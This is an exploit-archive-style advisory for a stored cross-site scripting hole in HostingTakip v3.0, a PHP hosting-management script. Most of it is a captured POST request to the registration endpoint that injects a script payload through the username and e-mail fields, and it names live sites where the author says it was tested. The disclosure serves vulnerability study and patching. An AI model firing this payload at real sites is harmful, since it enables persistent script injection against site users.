HostingTakip v3.0 - Stored XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
Love to _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu ( milw00rm.com )
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : HostingTakip
|~Affected Version : v3.0
|~Software : http://www.hostingtakip.com & http://wmscripti.com/php-scriptler/hostingtakip-hosting-yonetim-scripti.html
|~Official Demo : http://hostingtakip.teknoder.com/demo/
|~RISK : Medium
|~Tested On : [L] Windows 7, Mozilla Firefox
####################INFO################################
XSS payload is possible to run in your registration form.
click on "Yeni Mteri" Here the e-mail section appears unprotected been no filtering
Any payload code to enter "uye-duzenle.php" on will be permanent and will work
########################################################
Tested on;
http://www.ayashosting.com
http://www.oneritasarim.com/hostingtakip/
----------------------------------------------------------
Proof image: http://i.hizliresim.com/mGZzQ8.png
----------------------------------------------------------
Request
----------------------------------------------------------
POST http://www.oneritasarim.com/hostingtakip/kayit_tamamla.php
Request Headers:
Host[www.oneritasarim.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.oneritasarim.com/hostingtakip/y_kullanici.php]
Cookie[PHPSESSID=1b4b474c7fc50e0885aae61274ac0b55; __utma=221857094.828791546.1426246879.1426246879.1426246879.1; __utmc=221857094; __utmz=221857094.1426246879.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)]
Connection[keep-alive]
Post Data:
kadi[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]
posta[%3C%2Fscript%3E%3Cscript%3Ealert%28%27h4+Here%27%29%3C%2Fscript%3E]
sifre[123456]
ad[123456]
tc[012345678901]
tel[12345678901]
mustip[b]
sehir[h4]
ilce[h4]
adres[h4x0resec.blogspot.com]
hakkimda[h4]
guv[1b4b47]
B1[G%F6nder]
Response Headers:
Content-Encoding[gzip]
Vary[Accept-Encoding]
Date[Fri, 13 Mar 2015 12:18:10 GMT]
Server[LiteSpeed]
Connection[close]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Type[text/html]
Content-Length[143]